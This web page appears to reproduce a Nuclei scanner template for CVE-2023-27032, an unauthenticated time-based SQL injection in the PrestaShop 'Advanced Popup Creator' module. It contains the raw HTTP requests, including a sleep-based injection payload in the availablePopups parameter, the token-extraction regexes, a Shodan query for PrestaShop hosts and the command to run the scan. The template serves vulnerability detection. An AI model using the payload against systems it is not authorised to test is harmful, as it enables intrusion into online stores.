Skip to content
Nuclei Templates

PrestaShop AdvancedPopupCreator - SQL Injection

ID: CVE-2023-27032

Severity: critical

Author: MaStErChO

Tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate

Description

Section titled “Description”

In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.

YAML Source

Section titled “YAML Source”
id: CVE-2023-27032


info:
  name: PrestaShop AdvancedPopupCreator - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
  reference:
    - https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
    - https://addons.prestashop.com/en/pop-up/23773-popup-on-entry-exit-popup-add-product-and-newsletter.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27032
    cwe-id: CWE-89
    epss-score: 0.01979
    epss-percentile: 0.88753
    cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: idnovate
    product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter"
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


      - |
        @timeout 20s
        POST /module/advancedpopupcreator/popup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}


    matchers:
      - type: dsl
        dsl:
          - duration_2>=6
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, 'popups','hasError')
        condition: and


    extractors:
      - type: regex
        name: time
        group: 1
        regex:
          - ',"time":([0-9]+),'
        internal: true


      - type: regex
        name: token
        group: 1
        regex:
          - ',"static_token":"([0-9a-z]+)",'
        internal: true
# digest: 4b0a00483046022100de0c4ec838a6a330a05cedb1da5536decf468a5007986040dc905e12959df8ac022100d640e0ced44bdcf78c8266a7121207a19e7c807eace08a72de94183a9b11f43c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-27032.yaml"

View on Github